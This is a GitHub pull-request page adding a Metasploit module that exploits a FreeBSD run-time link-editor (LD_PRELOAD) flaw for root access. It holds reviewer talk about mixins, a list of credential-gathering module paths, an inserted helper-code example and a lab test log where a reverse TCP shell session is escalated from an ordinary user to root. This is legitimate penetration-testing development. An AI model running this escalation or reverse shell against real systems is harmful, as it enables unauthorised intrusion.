
Add FreeBSD rtld execl() Privilege Escalation module #11808

Merged
merged 1 commit into from May 20, 2019

Conversation


@bcoles bcoles commented May 3, 2019

Add FreeBSD rtld execl() Privilege Escalation module

@space-r7 space-r7 self-assigned this May 15, 2019
end
vprint_good "FreeBSD version #{kernel_release} appears vulnerable"

unless command_exists? 'gcc'

@cbrnrd cbrnrd May 19, 2019


@bcoles bcoles May 20, 2019

It does, but this is a FreeBSD module.

The mixins are a mess, and not something I want to tackle in this PR.

Despite BSD and FreeBSD being treated as different platforms in exploit and payload contexts, there are no BSD or FreeBSD mixins. Instead, the closest match is the Unix mixin, which happens to also import msf/core/post/linux/system.

Importing a mixin for a different platform for a single method (that's 1 line long) didn't seem appropriate. This pollutes the namespace and is more likely to introduce issues if the Linux mixins change in the future.

Similarly, there's a method for the is_root? check in the Linux mixins.

Ideally, the UNIX mixin should be updated to support is_root? and has_gcc?, and remove the dependency on msf/core/post/linux/system. The following modules will also need to be updated. Not something I want to tackle in this PR. I think some of the following are unnecessarily including the Unix mixin, and could instead simply import the Linux mixin.

$ grep -rn Msf::Post::Unix modules/
modules/exploits/linux/local/autostart_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/rc_local_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/service_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/cron_persistence.rb:10:  include Msf::Post::Unix
modules/post/linux/gather/ecryptfs_creds.rb:8:  include Msf::Post::Unix
modules/post/linux/manage/sshkey_persistence.rb:14:  include Msf::Post::Unix
modules/post/linux/manage/pseudo_shell.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/maven_creds.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/lastpass_creds.rb:13:  include Msf::Post::Unix
modules/post/multi/gather/docker_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/rsyncd_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/rubygems_api_key.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/fetchmailrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/aws_keys.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/netrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/ssh_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/gpg_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/dbvis_enum.rb:12:  include Msf::Post::Unix
modules/post/multi/gather/irssi_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/remmina_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/pgpass_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_add_db_admin.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/hsts_eraser.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_query.rb:10:  include Msf::Post::Unix
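An illustration of the mixin shape described above (is_root? and has_gcc? built on a platform-neutral command_exists? and cmd_exec, with no import of msf/core/post/linux/system), added here as an example. It is not code from the Metasploit Framework or from this PR; the UnixCompat module name, the FakeSession and FakeModule stand-ins and the module_for helper are constructed for the example.

```ruby
# Added example (not Metasploit Framework code): a platform-neutral mixin
# sketch providing is_root? and has_gcc? without pulling in the Linux
# system mixin. Module name UnixCompat and the stubs below are hypothetical.

module UnixCompat
  # Run a shell command on the session and return its stdout as a String.
  # A real Metasploit post mixin gets cmd_exec from the session; here the
  # including class exposes a `session` that responds to cmd_exec.
  def cmd_exec(cmd)
    session.cmd_exec(cmd)
  end

  # True when a command is resolvable in PATH on the target.
  # `command -v` is POSIX, so it works on BSD and Linux alike and does not
  # depend on `which` being present in the base install.
  def command_exists?(cmd)
    # Refuse anything that is not a bare command name so the check can never
    # be turned into a shell injection by a caller passing untrusted input.
    return false unless cmd.to_s.match?(/\A[A-Za-z0-9_.+-]+\z/)
    cmd_exec("command -v #{cmd} >/dev/null 2>&1 && echo FOUND").strip == 'FOUND'
  end

  def has_gcc?
    command_exists?('gcc')
  end

  # Effective uid check via POSIX `id -u`. Empty or non-numeric output
  # (for example from a dead session) is treated as "not root".
  def is_root?
    out = cmd_exec('id -u').strip
    out.match?(/\A\d+\z/) && out.to_i == 0
  end
end

# Constructed stand-in for a Metasploit session: maps commands to canned output.
class FakeSession
  def initialize(responses)
    @responses = responses
  end

  def cmd_exec(cmd)
    @responses.fetch(cmd, '')
  end
end

# Constructed stand-in for a post module that includes the mixin.
class FakeModule
  include UnixCompat
  attr_reader :session

  def initialize(session)
    @session = session
  end
end

# Build a module over canned responses describing a target (constructed data).
def module_for(uid:, gcc_present:)
  responses = { 'id -u' => "#{uid}\n" }
  responses['command -v gcc >/dev/null 2>&1 && echo FOUND'] = "FOUND\n" if gcc_present
  FakeModule.new(FakeSession.new(responses))
end

if __FILE__ == $PROGRAM_NAME
  m = module_for(uid: 1001, gcc_present: true)
  puts "root? #{m.is_root?}  gcc? #{m.has_gcc?}"
end
```

The two probes are deliberately POSIX-only so the same mixin can serve BSD, FreeBSD and Linux modules, and command_exists? rejects anything other than a bare command name so a caller cannot accidentally pass shell metacharacters into the session.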


@space-r7 space-r7 commented May 20, 2019

Tested on FreeBSD 8.0:

msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(a_user) gid=1001(a_user) groups=1001(a_user),0(wheel)
background

Background session 1? [y/N]  y
msf5 exploit(multi/ssh/sshexec) > use exploit/freebsd/local/rtld_execl_priv_esc 
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] gcc is installed
[*] Writing '/tmp/.Kw5aja.c' (147 bytes) ...
[*] Writing '/tmp/.3jsxsvcw.c' (365 bytes) ...
[*] Writing '/tmp/.tSblgW0' (172 bytes) ...
[*] Launching exploit...
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.135:65296) at 2019-05-20 11:52:45 -0500
[+] Deleted /tmp/.Kw5aja.c
[+] Deleted /tmp/.Kw5aja.o
[+] Deleted /tmp/.wAZZN.0
[+] Deleted /tmp/.3jsxsvcw.c
[+] Deleted /tmp/.3jsxsvcw
[+] Deleted /tmp/.tSblgW0

id
uid=0(root) gid=0(wheel) groups=0(wheel)

I modified sshexec to get the low-privileged shell on the FreeBSD target and just noticed you updated sshexec in another PR that adds the proper targets. Thanks for doing that!

The code LGTM, so I'll get this landed soon.

@space-r7 space-r7 merged commit 2ee7517 into rapid7:master May 20, 2019
3 checks passed
space-r7 added a commit that referenced this issue May 20, 2019
@bcoles bcoles deleted the rtld_execl_priv_esc branch May 20, 2019

@space-r7 space-r7 commented May 20, 2019

Release Notes

This module results in a shell with root privileges in FreeBSD by exploiting a vulnerability in the run-time link-editor (rtld). Exploiting this vulnerability allows for loading arbitrary objects via LD_PRELOAD that can result in privileged code execution.
